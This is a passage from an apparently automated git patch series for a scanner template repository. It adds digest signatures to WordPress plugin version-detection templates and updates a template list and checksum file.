490a0046304402201f7b82f7e6a9c6f24b940f2bfaf91dcc514f9aaa62ef8025a3166d6e49190fb002200f8a3ec15305abfbd4b358faef563de58eac9394619fcf560d644861006032b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df49..d467105e1fe 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b0470b762199b905e27020511d55d5b1eb83627583361773cc53cb7951f18b4022100b0e02d1bd6fe83a34a46d18034d8d5cf5bf83eaef62747227002c73fadb4c45c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee0467..6eda5f66db0 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d78ec5393297257820ed021a2b2c32567175d0ac9687fc72fd3deb581cc590a60221008786a22ee6a36f2c62518a446106e25d5e3a08e578e3b9e1304ad7a9dafe3e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0d..30b0c571a64 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021560ac33b4b82f917023d10fdde395e8d65cacc138880cadf6f929bb499c934022100f68e31a9703453a74ca957d3c88c32f9402644e825d60930b33d08bcb20b9227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff55..dc648e15bcf 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bdc171bb7d9ff7065e3ecdb8f06c1f222cebb6a4d8e878edccf8a8c6a58eb6b022100c40817ea26c76623c77f50e5d47eaef40250204aa87bcab3d2a9b98420671e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e3..e1d0b579fd5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022046393a7093b0a14ef2743dcd94e62d176af17b29de6c8026645e80cf5f4a7789022100e6d7f7cf4a8fb597f3593290f3dd9b8dc11bd112ad90becc19e9298e498d2898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed6..629439acb59 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0d431f8885f905dafbf76fe1444299af5d615d2eabdbd7f983e52006be33b5102206c047f984f838490f42a21dc1fd88b6d33127fb4a2770bd156e3ac409d669930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a172..f033252e949 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aeb3774ea370a73fe2b7a162d13df7f73b25d6fa761ca76f6b853df55e2d0ac502200a0c16c4d7c13e0039e10cc80eb20bbce9a0a96a01009874872292b68cd6f289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afebd..e9eddc4c395 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bb300e7116c50b114c0aacb6a086647b173da0e019fa4cb56ca389815dffe6c022100c6f9d68dfea1b208b03edbecb6a1865805a73ad8c9eeb89c93759868e65cd04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b49..ea0789c4e4a 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae898303673464ba3816949325821948ee752f688bc15e47125e3fd69d644e900221008c68527f1380a636e9e53af1c512e22d70dac37cd0dbb4b181419acdc72ac4c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda1174..ad7b5c96ec5 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dbb2faa62f33338d616af5c603039cb86bf08aea526d628db1903726d4b452d502203322910323a5b860c8bdb03539037f08f03d1f628e2437b195b6a207bed704a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 945fe23fcdc9c6a339104f5a5871f17bc58e0686 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:46:35 +0000 Subject: [PATCH 151/247] Auto Generated New Template Addition List [Mon Jul 15 04:46:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index be9a06be7bd..ee9a11893a4 100644 --- a/.new-additions +++ b/.new-additions @@ -7,5 +7,6 @@ http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/snoop-servlet-exposure.yaml +http/misconfiguration/servicenow-title-injection.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 40a045389bd29d71cd1d00a62ab2386413ff154b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:46:41 +0000 Subject: [PATCH 152/247] Auto Generated Templates Checksum [Mon Jul 15 04:46:41 UTC 2024] :robot: --- templates-checksum.txt | 410 +++++++++++++++++++++-------------------- 1 file changed, 206 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index abe35b6839e..6888ca621e2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:195a062188e964c090fb5e569831f7956db9829a -cves.json-checksum.txt:543480fd5d685fb2dd4d1ca242c6dfa4e5ffa6b1 +cves.json:54289a82cf1c037dd6448d8f9eeb1bf730e677c6 +cves.json-checksum.txt:d5f06463ea1caf086fbccbaca48d49d83876faf8 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3492,9 +3492,10 @@ http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 -http/cves/2024/CVE-2024-4879.yaml:ff11adf8264ac17f5c4b5e238d32016c92492b75 +http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 +http/cves/2024/CVE-2024-5217.yaml:fb8c78c0785c6975ce0706b89ff8e911d9e022e6 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -5916,6 +5917,7 @@ http/misconfiguration/sentinel-license-monitor.yaml:123e83ea787470cc96323f371c0f http/misconfiguration/seq-dashboard-unath.yaml:c8f87c43bbc194440decf9a5a58444279b11fb5d http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 +http/misconfiguration/servicenow-title-injection.yaml:8cdd5a1a8081cc7a66789662570f9a1f533d49da http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0 http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d @@ -7280,228 +7282,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:ec6d6a80835bbb3f4141c9af043faa54caa09d90 +http/technologies/wordpress/plugins/add-to-any.yaml:45e1ec080492018feecfa2c9995d9f4f46a7e196 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:2a710053db37c53c93a1b7c2712ec6fbf9e5dc9d http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:49a18104c3daf80a90c52b4919c7e512e81d0d9c +http/technologies/wordpress/plugins/akismet.yaml:1a755eae638b38bf09e11a20d46e44db70bd0456 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:cf549a4946cd28525b458e7d22fd60380e0c63cb +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:2a418957205cd8e1ac557a830e88689ae5ded1e6 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:d0a62ac8b1184cd285a851d188813aa801eed1f4 +http/technologies/wordpress/plugins/amp.yaml:70d51ff352fbe5bd009823857d20c84cd1077539 +http/technologies/wordpress/plugins/antispam-bee.yaml:e3dd8e3cabe81656fa177144104dbda698fa1bdf +http/technologies/wordpress/plugins/astra-sites.yaml:7e6ad639b876a664219d0b6c21179d9819cd9cd7 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:18ec876d0e4b0404ca5650d6ba87cf9bf30faf3f +http/technologies/wordpress/plugins/backwpup.yaml:3e7c70d589c265eafcd9a598b4c1ae79d1dedf3e +http/technologies/wordpress/plugins/better-search-replace.yaml:693592eaf5badf4f412417951e15b456fc488294 +http/technologies/wordpress/plugins/better-wp-security.yaml:158e86629c4d67a29d60f802f1e293ddcdd2e576 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:1e04cf0e900ffad1f109cc7a0c2739099aa85470 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:39c92ef0fa3d4208b26e7389f47d97b9dc25fa05 +http/technologies/wordpress/plugins/breeze.yaml:011bab668295bdc97fcaefc417c8fba3221a7f07 +http/technologies/wordpress/plugins/broken-link-checker.yaml:5003e452889b0f738b14ee1420944b2288b6e996 +http/technologies/wordpress/plugins/chaty.yaml:39c3dd5785e9e8091443c628d340f95870fcbf22 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:ca5f7fddd0ff0cf926791c592bdea137fe52813f +http/technologies/wordpress/plugins/classic-editor.yaml:a2bb1a7615d1e16f680b124ee1698e320d348101 +http/technologies/wordpress/plugins/classic-widgets.yaml:09369b35177b15e9effbe11495feba8fd0194c0e +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e5b4a79a7a12a16ff3522723149892f8143a9ccf http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:8f356781b0c6f60c84800edfef3d297e6fedac13 +http/technologies/wordpress/plugins/coblocks.yaml:21466ff13da33db1ed0a12245f8c1cdfe5571c93 +http/technologies/wordpress/plugins/code-snippets.yaml:f00c9620bb5f5c1628a1e990431f3610e04bbc08 +http/technologies/wordpress/plugins/coming-soon.yaml:eb264fdfa1582b57d383fb29f0ac4e32185a4156 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:0b4d7cd050e6eef73b7b0746d03b3f26dc1793de +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:bb136d72c0a23f9da731f40c98d53498428d4d42 +http/technologies/wordpress/plugins/contact-form-7.yaml:16cfe7fb7fa0edb3ee7ba353a2f2f16a3936ad08 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:c1afab529d3e962c0326bf3f6c04584c7698c576 +http/technologies/wordpress/plugins/cookie-law-info.yaml:e4f18a649dcc131f5fc9dc8b99691e8097b341e0 +http/technologies/wordpress/plugins/cookie-notice.yaml:42a4e3f4aeea8e29c796360d65436661ff6eee02 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:485d6b2d46344ae950b628203713f9b99c0d1b70 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:b3fc48e6d7f84c27712fdf7b7184036421d1a1f3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:1de9232d645f8f8ab903ce3b98e23be8d2bd8f46 +http/technologies/wordpress/plugins/custom-css-js.yaml:6a8517d76a9285f725f484611156cf7b4a94c5dd +http/technologies/wordpress/plugins/custom-fonts.yaml:5233af35c176fb81de0987b7d990fe847280375c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:962a516457ef2d168867b8a8e389f46aa5722355 +http/technologies/wordpress/plugins/disable-comments.yaml:d703ead0cccc639c55d875c43bf4b284b016b5d9 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:d795991385be7b003655fe296fb894a7a9eaceac +http/technologies/wordpress/plugins/duplicate-page.yaml:270a67913b87b96095ab292df47dd79593259b39 +http/technologies/wordpress/plugins/duplicate-post.yaml:8541b4f219bff5af4a38bd8036a1848a7c305b2f +http/technologies/wordpress/plugins/duplicator.yaml:ca505fad84fd7e76ff38c107ee87c5a5211cf617 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:7dd68e2bc5d3e7f9e811180eabc75de75d93e64a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:39f2cda7226c70e0826d562bb89ad8c0f760e67d +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:a1b27312856f2086c164bc3675f01182f0cedf57 +http/technologies/wordpress/plugins/elementor.yaml:30cea111c3825610880ad65dbe200e49fd600069 +http/technologies/wordpress/plugins/elementskit-lite.yaml:881d5a2dc1b98160cff8d3e294f26ae14eeaae7c +http/technologies/wordpress/plugins/enable-media-replace.yaml:05a30d6aab1d34d80f461603f1f2afdf892b1b7b +http/technologies/wordpress/plugins/envato-elements.yaml:7832ff853d622bfc6b7cadab29a827ef3cbd4297 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:bbadddcc15a21cb6df46656eb827e03e5e307c12 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:4a95e18a2b08b41359a90e35be582d97997bdece +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:c8314bf4b050f3d4efea10042fd3ab58327e3880 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:925c51f8799ee427f58415321c9af2d3f25f8970 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:c30c43c11707053ec5b2ce4b4fcd7185873de9ef +http/technologies/wordpress/plugins/flamingo.yaml:2d551553838a8d84666aaa0a202f9b2faad2743d +http/technologies/wordpress/plugins/fluentform.yaml:6275e0845d8decc23fcf50d42b8ca2f14ba00fea +http/technologies/wordpress/plugins/font-awesome.yaml:f24a1db1dd21796aeb3ba2e50bc1063686dddd6c +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6961fa2e30b8576eaf4f2ee8a255cf513f7ddec4 +http/technologies/wordpress/plugins/formidable.yaml:f1bd461de526addeee85b9f926da7634c250c041 +http/technologies/wordpress/plugins/forminator.yaml:7160b4865b0549f5bbb4f79be209bbb3d9ce2b9a +http/technologies/wordpress/plugins/ga-google-analytics.yaml:55ba408567d497d46156750e38e607091bc15ab3 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:181b06a305c96a16714411569b08d0e2291b4035 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:f99f54e65b0792a3b9d42ae312a695146c25f673 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:37db5bcdd61dbaaf8164482f195d5ed4af5bc629 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:faf94162127afa8d863cd0dcf5605899b97105e8 +http/technologies/wordpress/plugins/google-site-kit.yaml:85906b13a43595f0d9126c63872516dd83062a26 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:182794b9602a4f5b33baf8d37eab1c70eca52b99 +http/technologies/wordpress/plugins/gtranslate.yaml:55d22ad1448bd8cf0532aaa4ed1f36b443f62203 +http/technologies/wordpress/plugins/gutenberg.yaml:4ee6aac103c4b896ae47c3b4882427dfeba45eb3 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:484d4d318315a9b094a2a81f3c44eb33261c41f0 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:fa7b84a46f5fb575dddedb7c486d2adbaafcde17 